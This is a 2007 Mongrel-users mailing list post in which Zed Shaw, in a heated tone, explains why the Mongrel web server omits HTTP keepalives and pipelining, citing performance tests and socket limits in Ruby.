On Thu, 4 Jan 2007 13:22:51 -0700
"Chad Woolley" <[EMAIL PROTECTED]> wrote:

> Hi,
>

Chad!  How's it going man?  Sorry but I gotta rant for a second here.
 
> I'm looking for suggestions on the simplest way to implement an HTTP
> proxy under Rails/Mongrel.  It should preserve ALL of the proxied HTTP
> response - including all header content such keepalives, etc.
> 
> Yes, I know I can do this with Apache's proxy module, and we already
> do that for the non-development/test environments.  This is just for
> the development/test environment where we don't run Apache, just
> Mongrel.

It might be possible, but you might have better luck maybe with pound or 
another solution.  Hit me up off-line for some help.

> http://lists.netisland.net/archives/phillyonrails/phillyonrails-2006/msg00231.html

First off, Brian McCallister is wrong.  He's been here before, asked about 
pipelines and keepalives and all sorts of other crap, and I answered him 
without much response.  Apparently he's now trolling in other locations:  

  "I presume something in the design of Mongrel makes it tough to implement 
keep-alives. Saying that they are poorly specced, or hurt performance for the 
protocol or client is, umh, wrong, however. I have a hunch that the reason 
comes back to the choice to actually build an HTTP grammar with the ragel FSM 
compiler and making the FSM clean across requests on a single connection has 
proven difficult."

Here's the reasons, which I covered with Brian previously that Mongrel doesn't 
do keepalives or pipelining:

1) The last study (which everyone references) done on HTTP performance was done 
in 1999 and had dubious methodology with limited repeatability.  
http://www.w3.org/Protocols/HTTP/Performance/Pipeline
2) The above study doesn't cover dynamic content from dynamic languages on a 
localhost adapter.  The situation most commonly used with Mongrel.
3) The keepalives and pipelining have ambiguous semantics so they're difficult 
to implement reliably.  They're also vulnerable to several design flaws that 
allow clients to take down servers with "trickle" attacks.
4) RUBY USES SELECT AND ON MOST SYSTEMS CAN ONLY PROCESS 1024 OR LESS FILES AT 
ONCE.
5) Given #1, #2, #3, #4, a client can connect to a Ruby based web server, 
slowly trickle out a series of pipelined requests (each being allowed to be 
128k in headers) taking up all of the sockets available (which amounts to 
actually about 256 to 500 in practice) until the server is useless.
6) The performance measurements I did showed that when processing requests off 
localhost these elements of http didn't make an improvement at all.  This is a 
combination of localhost being pretty damn good on many systems, and Ruby being 
slow as dirt.
7) Also, there is a boost when the connection is simply closed right away.  The 
reason is: http://www.ajaxperformance.com/?p=33

That's right, most browsers actually don't even use this incredibly dense, 
horribly designed, stupid addition to the HTTP protocol.  Tell me, what's the 
point of all this maintaining connections if browsers don't use it?  Huh?

Ragel is not the reason, it was done after lots of testing and experimentation. 
 I'm not an idiot and the above comment pisses me off to no end.  If Ruby could 
handle it, I'd have implemented it for no other reason that to have these 
idiots who know jack all about protocol design or measurement just shut up and 
actually use the damn thing.

-- 
Zed A. Shaw, MUDCRAP-CE Master Black Belt Sifu
http://www.zedshaw.com/
http://www.awprofessional.com/title/0321483502 -- The Mongrel Book
http://mongrel.rubyforge.org/
http://www.lingr.com/room/3yXhqKbfPy8 -- Come get help.
_______________________________________________
Mongrel-users mailing list
Mongrel-users@rubyforge.org
http://rubyforge.org/mailman/listinfo/mongrel-users

Reply via email to